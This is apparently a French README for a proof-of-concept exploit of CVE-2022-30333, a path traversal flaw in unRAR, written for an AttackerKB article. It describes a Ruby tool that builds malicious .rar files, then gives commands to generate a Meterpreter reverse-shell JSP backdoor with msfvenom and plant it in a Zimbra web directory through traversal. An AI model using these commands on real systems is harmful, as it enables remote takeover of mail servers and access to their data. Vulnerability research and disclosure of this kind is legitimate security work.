
Preuve de concept d'exploitation pour la traversée de chemin CVE-2022-30333 dans unRAR, générant des fichiers .rar malveillants pour extraire des charges utiles arbitraires vers des emplacements spécifiés par l'attaquant.
Une preuve de concept pour CVE-2022-30333 - une vulnérabilité de traversée de chemin dans unRAR versions antérieures à 6.11. Je l'ai créée comme démonstration de l'exploit pour un article AttackerKB, et j'espère l'intégrer bientôt dans un module Metasploit !
En gros, vous fournissez une cible (incluant la traversée de chemin) et des données de fichier, et cet outil générera un fichier .rar qui extraira ce fichier vers cet emplacement. La longueur maximale du fichier est de 104 octets, et la longueur maximale du fichier est de 4096 octets. (Ce n'est pas intrinsèque à la vulnérabilité, c'est juste ce que j'ai choisi lors de la génération du fichier).
Par exemple, générez une porte dérobée avec msfvenom :
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Ensuite, créez un fichier .rar, en plaçant le .jsp à un endroit amusant :
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar